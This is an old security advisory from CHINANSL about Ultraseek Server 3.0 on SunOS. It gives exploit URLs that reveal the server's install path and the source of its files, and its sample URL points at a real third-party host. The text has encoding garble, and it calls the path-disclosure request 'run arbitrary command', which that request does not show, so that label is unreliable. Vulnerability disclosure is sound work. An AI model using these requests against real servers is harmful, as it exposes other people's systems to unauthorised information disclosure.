CHINANSL Security Advisory(CSA-200012) Topic: Ultraseek Server 3.0 Vulnerability Release Date£º Dec 6, 2000 Affected system: ============ Ultraseek Server 3.0 ¡¡¡¡- SunOS Impact: ====== CHINANLS security team has found a security problem in Ultraseek Server 3.0 . Exploitation of this vulnerability, It is possible that a malicious user can get the absolute path and source code of Ultraseek Server addons. Description£º ========= Ultraseek Server with interpreter can interpret the script file and execute some correcpond functions.But Ultraseek Server have some bug to exploit the script file. Exploit: ===== (1) run arbitrary command : http://target:8765/null.html Ultraseek Server will return : The path where Ultraseek Server install and other information. (2) we can get the content of source code files with this bug too: http://target:8765/index.html/ Ultraseek Server will return the conten of index.html and other source code which work for Ultraseek Server. Sample: ======= http://www.sun.com.cn:8765/index.html/ Solution: ======= None DISCLAIMS: ======== THE INFORMATION PROVIDED IS RELEASED BY CHINANSL "AS IS" WITHOUT WARRANTY OF ANY KIND. CHINANSL DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL CHINANSL BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF CHINANSL HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. Copyright 1999-2000 CHINANSL. All Rights Reserved. Terms of use. CHINANSL Security Team (http://www.chinansl.com)